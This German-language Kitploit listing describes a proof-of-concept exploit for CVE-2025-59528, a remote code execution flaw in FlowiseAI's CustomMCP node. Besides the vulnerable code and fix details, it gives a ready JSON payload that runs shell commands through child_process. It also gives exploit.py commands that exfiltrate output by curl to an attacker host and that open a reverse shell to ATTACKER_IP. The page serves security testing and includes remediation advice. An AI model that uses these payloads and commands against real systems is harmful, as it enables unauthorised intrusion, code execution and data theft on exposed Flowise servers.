Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - FlowiseAI CustomMCP Remotecodeausführung | Kitploit
Tools/GitHubGitHub/usifaraby/cve-2025-59528-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - FlowiseAI CustomMCP Remotecodeausführung

Repository anzeigen
110vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59528 - FlowiseAI CustomMCP Remote Code Execution

CVSS 10.0 (Critical) | Blind RCE | FlowiseAI Flowise >= 2.2.7-patch.1 und < 3.0.6

Überblick

Eine kritische Remote-Code-Execution-Schwachstelle im CustomMCP-Knoten von FlowiseAI Flowise. Die Funktion convertToValidJSONString übergibt benutzergesteuerte Eingaben aus dem Parameter mcpServerConfig direkt an den Function()-Konstruktor von JavaScript, der funktional äquivalent zu eval() ist, wodurch die Ausführung beliebigen JavaScript-Codes mit vollständigen Node.js-Laufzeitprivilegien ermöglicht wird.

  • Entdeckt von: Kim SooHyun (@im-soohyun)
  • Advisory: GHSA-3gcm-f6qx-ff7p
  • Behoben in: Flowise v3.0.6 (Function() wurde durch JSON5.parse() ersetzt)

Verwundbarer Code

In packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts, Zeilen 262–270:

function convertToValidJSONString(inputString) {
    return Function('return ' + inputString)();  // ← beliebige Codeausführung
}

Der Taint-Flow:

HTTP POST → /api/v1/node-load-method/customMCP
  → controller.getSingleNodeAsyncOptions()
    → service layer
      → CustomMCP.listActions()
        → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()

Ausnutzung

Hierbei handelt es sich um ein blindes RCE – die Befehlsausgabe wird nicht in der HTTP-Antwort widergespiegelt. Verwenden Sie Callback-Techniken (curl/wget) oder eine Reverse Shell, um die Ausführung zu bestätigen.

Voraussetzungen

BedingungDetails
Flowise-Version>= 2.2.7-patch.1, < 3.0.6
NetzwerkzugriffAPI-Endpunkt auf Port 3000 (Standard)
AuthentifizierungOptional für < 3.0.1, erforderlich für >= 3.0.1

Payload

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}

Verwendung

pip install requests

Prüfen, ob das Ziel verwundbar ist (zeitbasiert)

python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass

Blind-Befehlsausführung

# Ausgabe per Callback exfiltrieren
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email [email protected] --password pass

Reverse Shell

# Listener starten
nc -lvnp 4444

# Exploit ausführen (versucht automatisch bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email [email protected] --password pass

Authentifizierungsoptionen

# JWT-Auth (Flowise >= 3.0.1)
--email [email protected] --password pass

# Basic Auth (Flowise < 3.0.1 mit FLOWISE_USERNAME-Umgebungsvariable)
--username admin --password pass

# Raw-Cookie-String (Fallback)
--cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."

Behebung

  • Upgrade auf Flowise >= 3.0.6 durchführen
  • API-Zugriff per Firewall/VPN einschränken
  • Authentifizierung auf allen Instanzen aktivieren
  • Logs auf POST-Anfragen an /api/v1/node-load-method/customMCP überwachen

Referenzen

  • NVD — CVE-2025-59528
  • GitHub Advisory — GHSA-3gcm-f6qx-ff7p
  • SonicWall Threat Analysis
  • Fix Commit — Flowise v3.0.6

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets eine ordnungsgemäße Genehmigung ein.

Tool herunterladen